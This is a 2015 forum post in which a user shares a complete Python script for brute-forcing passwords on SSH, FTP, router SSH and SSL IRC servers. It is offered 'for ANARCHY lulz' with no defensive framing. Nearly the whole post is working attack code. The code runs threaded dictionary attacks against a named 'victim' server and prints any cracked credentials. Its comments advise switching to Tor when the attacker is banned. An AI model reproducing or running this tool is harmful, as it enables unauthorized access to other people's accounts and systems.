multi protocol dictionary password cracker for giggles

A place to submit all custom code, scripts, and programs.
Forum rules
Do NOT post malicious code or programs. Please review all code posted in this forum before downloading or running any of the code or programs here.

multi protocol dictionary password cracker for giggles

Post by MadM0use on Mon Jul 06, 2015 11:29 am
([msg=88859]see multi protocol dictionary password cracker for giggles[/msg])

Wrote this a couple years ago, so please dont make comments about my coding practices, because i dont write code like this anymore lol. but here you go, for ANARCHY lulz

Code: Select all
#!/usr/bin/env python
# multi protocol dictionary password cracker
# Now with large Dictionary support,
# and the ability to crack router SSH with user:password dictionaries
# Written By MadMouse

import socket,random,time,signal,thread,sys,Queue,os,pxssh,ftplib,ssl

######################################################################################################
import xtermcolor

def draw_bitmap(bitmap):
   sys.stderr.write("\r\n")
   for row in bitmap:
      for item in row:
         for pixel in item:
            sys.stderr.write(xtermcolor.colorize('#',pixel[1]).split('#')[0]+pixel[0].encode('utf-8'))
      sys.stderr.write("\r\n")
   sys.stderr.write("\r\n")
def f1(n):
   return [(' ', 16777215),]*n
def f2(n):
   return [(u'\u2592', 65280),]*n
logo = [[f1(1),f2(4),f1(2),f2(4),f1(3),f2(8),f1(7),f2(2),f1(3),f2(3),f1(4),f2(4),f1(3),f2(6),
f1(3),f2(2),f1(3),f2(2),f1(1),f2(6),f1(2),f2(6),],[f1(1),f2(4),f1(1),f2(5),f1(3),f2(8),f1(1),
f2(8),f1(3),f2(4),f1(3),f2(4),f1(2),f2(8),f1(2),f2(2),f1(3),f2(2),f1(1),f2(2),f1(6),f2(1),
f1(6)],[f1(1),f2(10),f1(3),f2(8),f1(1),f2(8),f1(3),f2(2),f1(1),f2(2),f1(1),f2(5),f1(2),f2(2),
f1(4),f2(2),f1(2),f2(2),f1(3),f2(2),f1(1),f2(6),f1(2),f2(1),f1(6)],[f1(1),f2(10),f1(3),f2(8),
f1(1),f2(2),f1(4),f2(2),f1(3),f2(2),f1(1),f2(8),f1(2),f2(2),f1(4),f2(2),f1(2),f2(2),f1(3),
f2(2),f1(1),f2(6),f1(2),f2(3),f1(4)],[f1(1),f2(2),f1(2),f2(2),f1(2),f2(2),f1(3),f2(2),f1(4),
f2(2),f1(1),f2(8),f1(3),f2(2),f1(2),f2(3),f1(2),f2(2),f1(2),f2(8),f1(2),f2(7),f1(5),f2(2),
f1(2),f2(1),f1(6)],[f1(1),f2(2),f1(6),f2(2),f1(3),f2(8),f1(1),f2(8),f1(3),f2(2),f1(3),f2(1),
f1(3),f2(2),f1(3),f2(6),f1(3),f2(7),f1(1),f2(6),f1(2),f2(6),f1(1)]]

draw_bitmap(logo)

######################################################################################################
protocol_list = ["-ssh username server port number_of_threads dictionary_file",
      "-ftp username server port number_of_threads dictionary_file",
      "-routerssh server port number_of_threads dictionary_file",
      "-ircs username server port number_of_threads dictionary_file"]

def print_help():
   print("Usage: "+sys.argv[0]+" -<protocol> options\n\nPossible protocols are: ")
   for i in protocol_list:
      print(i)
   print("\n\nToo many threads with ssh will fail because the pxssh library is dependant on character devices, and those are limited...\nif you start seeing failure, try using around 5-10 threads.\n")
   exit(1)

if len(sys.argv) > 7 or len(sys.argv) < 6:
   print_help()

elif sys.argv[1] == "-ssh":
   print("\nCracking SSH password...\n")
   victim_username = sys.argv[2]
   victim_server = sys.argv[3]
   victim_port = int(sys.argv[4])
   thread_count = int(sys.argv[5])
   dictionary_file = sys.argv[6]
   secure_option = 1
elif sys.argv[1] == "-ftp":
   print("\n\nCracking FTP password...\n")
   victim_username = sys.argv[2]
   victim_server = sys.argv[3]
   victim_port = int(sys.argv[4])
   thread_count = int(sys.argv[5])
   dictionary_file = sys.argv[6]
   secure_option = 2
elif sys.argv[1] == "-routerssh" and len(sys.argv) == 6:
   print("\n\nCracking Router SSH password...\n")
   victim_server = sys.argv[2]
   victim_port = int(sys.argv[3])
   thread_count = int(sys.argv[4])
   dictionary_file = sys.argv[5]
   secure_option = 3
elif sys.argv[1] == "-ircs":
   print("\nCracking SSL IRC password...\n")
   victim_username = sys.argv[2]
   victim_server = sys.argv[3]
   victim_port = int(sys.argv[4])
   thread_count = int(sys.argv[5])
   dictionary_file = sys.argv[6]
   secure_option = 4
else:
   print_help()

###########################

class ChunkNeeded: pass
class CleanExit: pass
ipq = Queue.Queue()

###########################

password_list = []
file_chunk_size = 2000
file_chunk_position = 0
file_empty = False
password_attempts = 0

# open dictionary file chunk
def open_file_chunk(where,lines):
   if where+lines >= file_line_count:            # if the location >= line count
      file_empty = True               # count the file as empty from now on
      lines=(where+lines)-file_line_count         # adjust the number of lines
   f = open(dictionary_file)               # open the file
   for i in range(0,where+1): f.readline()            # iterate to the location specified
   for i in range(0,lines+1):               # count through lines specified
      password_list.append(f.readline().rstrip('\n'))      # add them to the password list
   f.close()                     # close the file
   while "" in password_list: password_list.remove("")      # remove any blank lines

# connect to a regular socket
def connect(server,port):
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)      # create a socket
   s.settimeout(3)                     # set the timeout to something low
   try:
      s.connect((server,port))            # connect to the socket
      s.settimeout(None)               # set the timeout back to blocking
      return s                  # on success return the connected socket
   except socket.error:                  # If the socket times out, or something stupid happens
      print('\n'+(80-27)/2*' '+">>>> Connection Failed <<<<\n")
   print("Fuck dude, this is NOT good...\nYou have been blocked, or blacklisted!!!")
   return None

def brute(idnum,dummy):
   global password_attempts
   run = 0
   while True:
      if not password_list:               # if the list is empty, then exit because the dictionary file is exhausted
         print("\n\nDictionary exhausted...")
         print("Password dictionary crack failed with: "+dictionary_file+"\n")
         ipq.put(CleanExit)            # send the exit signal to the main program
         return
      run+=1                     # add tick to run count
      random.seed(os.urandom(512))            # seed the random number generator
      try:
         password = random.choice(password_list)      # pick a random password from the list
         password_list.remove(password)         # remove the password from list
         if len(password_list) < thread_count:      # if the list is smaller than the open threads
            ipq.put(ChunkNeeded)         #   then send signal to main program to pull another chunk of the dict
         password_attempts+=1
      except IndexError:               # if there is an IndexError exception
         print("Password dictionary crack failed with: "+dictionary_file)
         ipq.put(CleanExit)            # send exit signal to main program
         return
      if secure_option == 1:      # if we have chosen the ssh protocol
         print("\nThread: "+str(idnum)+" Attempt: "+str(run)+" Host: "+victim_server+":"+str(victim_port)+" User: "+victim_username+" Password: "+password)
         try:
            s = pxssh.pxssh()         # load ssh socket
            s.login (victim_server, victim_username, password,port=victim_port)   # attempt login, if it fails, it throws an exception
            print("\n\n"+s.before+"\n")
            print("\n\nThe password is: "+password+"\n\n")   # tell us what the password is on success!!!!
            ipq.put(CleanExit)         # send the exit signal
            return
         except pxssh.ExceptionPxssh:         # on exception,
            continue            # business as usual
         except:
            print("Connection issues...\n")
            ipq.put(CleanExit)            # send the exit signal to the main program
            return
      if secure_option == 2:      # if we have chosen the ftp protocol
         print("\nThread: "+str(idnum)+" Attempt: "+str(run)+" Host: "+victim_server+":"+str(victim_port)+" User: "+victim_username+" Password: "+password)
         try:
            s = ftplib.FTP()         # load ftp socket
            socket.setdefaulttimeout(30)      # set a default timeout
            s.connect(victim_server,victim_port)   # connect to the ftp server
            s.login(victim_username, password)   # attempt to login
            s.retrlines('LIST')         # give us a running start
            s.close()            # close the connection
            print("\n\nThe password is: "+password+"\n\n")   # tell us what the password is on success!!!!
            ipq.put(CleanExit)         # send the exit signal
            return
         except ftplib.error_perm:         # on exception,
            continue
         except:
            print("Connection issues...\n")
            ipq.put(CleanExit)         # send the exit signal to the main program
            return
      if secure_option == 3:      # if we have chosen the routerssh protocol
         try:
            s = pxssh.pxssh()         # load ssh socket
            if password.split(':')[0] == "":
               continue
            print("\nThread: "+str(idnum)+" Attempt: "+str(run)+" Host: "+victim_server+":"+str(victim_port)+" User: "+password.split(':')[0]+" Password: "+password.split(':')[1])
            s.login (victim_server, password.split(':')[0], password.split(':')[1],port=victim_port)   # attempt login, if it fails, it throws an exception
            print("\n\n"+s.before+"\n")
            print("\n\nUser: "+password.split(':')[0]+"\nPassword: "+password.split(':')[1]+"\n\n")   # tell us what the password is on success!!!!
            ipq.put(CleanExit)         # send the exit signal
            return
         except pxssh.ExceptionPxssh:         # on exception,
            continue            # business as usual
         except:
            print("Connection issues...\n")
            ipq.put(CleanExit)         # send the exit signal to the main program
            return
      if secure_option == 4:      # if we have chosen the ircs protocol
         print("\nThread: "+str(idnum)+" Attempt: "+str(run)+" Host: "+victim_server+":"+str(victim_port)+" User: "+victim_username+" Password: "+password)
         try:
            s = connect(victim_server, victim_port)         # connect to server
            s = ssl.wrap_socket(s,ssl_version=ssl.PROTOCOL_TLSv1)   # start an ssl socket wrapper
            s.send("NICK " + victim_username + "\r\n")      # use this as the nick
            s.send("USER "+victim_username+" * 8 :"+victim_username+"\r\n")   # send fake user information
            data = s.recv(4096)               # receive the first part of the buffer
            while not data.find("NOTICE AUTH :"):         # wait for the auth notice
               data = s.recv(4096)
            s.send("PASS "+victim_username+":"+password+"\r\n")   # send auth attempt
            data = s.recv(4096)               # get first buffer
            while data:
               if data.find(" 464 "+victim_username) or data.find(" 463 "+victim_username):   # if login has failed
                  print("\n\nNot good, we are banned... try using tor man\n\n")   # tell us what the password is on success!!!!
                  ipq.put(CleanExit)         # send the exit signal
                  return
               elif not data.find(" 465 "+victim_username):   # if login hasnt failed
                  print("\n\nThe password is: "+password+"\n\n")   # tell us what the password is on success!!!!
                  ipq.put(CleanExit)         # send the exit signal
                  return
               data = s.recv(4096)
            continue
         except:
            print("Connection issues...\n")
            ipq.put(CleanExit)            # send the exit signal to the main program
            return

def iexit(signal, frame):
   print("We tried: "+str(password_attempts)+" passwords\n\n")
   sys.exit()                     # exit the main loop

signal.signal(signal.SIGINT, iexit)

print("Calculating number of lines in dictionary...")
f = open(dictionary_file)                  # open the dictionary file
file_line_count = sum(1 for line in f)               # calculate the number of lines
f.close()                        # close the dictionary

if file_chunk_size > file_line_count:               # if chunk size > line count
   file_chunk_size = file_line_count/2            # change the chunk size to line count / 2
print("Dictionary size: "+str(file_line_count)+" lines")
if thread_count > file_line_count/2:               # if thread count is > half of the line count
   thread_count = file_line_count/2            # thread count = half the line count

open_file_chunk(0,file_chunk_size)               # open the first chunk of the dictionary
for number in range(0,thread_count):               # for all threads specified to start
   thread.start_new_thread(brute, (number,None))         # start them

while True:                        # loop until exit signal is received
   try:
      task = ipq.get_nowait()               # get pending signal
      if task == CleanExit:               # if its the exit signal
         iexit(None,None)
      elif task == ChunkNeeded:            # if its the ChunkNeeded signal, pull in more of the dictionary file
         if file_empty == True: continue         # if the file is empty, dont pull from it
         file_chunk_position+=file_chunk_size      # add up a new chunk
         open_file_chunk(file_chunk_position,file_chunk_size)   # chunk the file and add it to the password_list
   except Queue.Empty: 0                  # if the queue is empty keep going
const char main[]="\xeb\xfe -> A fully functional program in C";

<@MadMouse> i am forgot what i was doing today but i had motivation and a distinct plan when i woke up stoned right now

http://pastebin.com/FnwUG5KS
Books:
http://goo.gl/muPm3d
User avatar
MadM0use
Experienced User
Experienced User
 
Posts: 70
Joined: Thu Sep 11, 2014 10:30 pm
Blog: View Blog (0)


Return to Custom Code

Who is online

Users browsing this forum: No registered users and 0 guests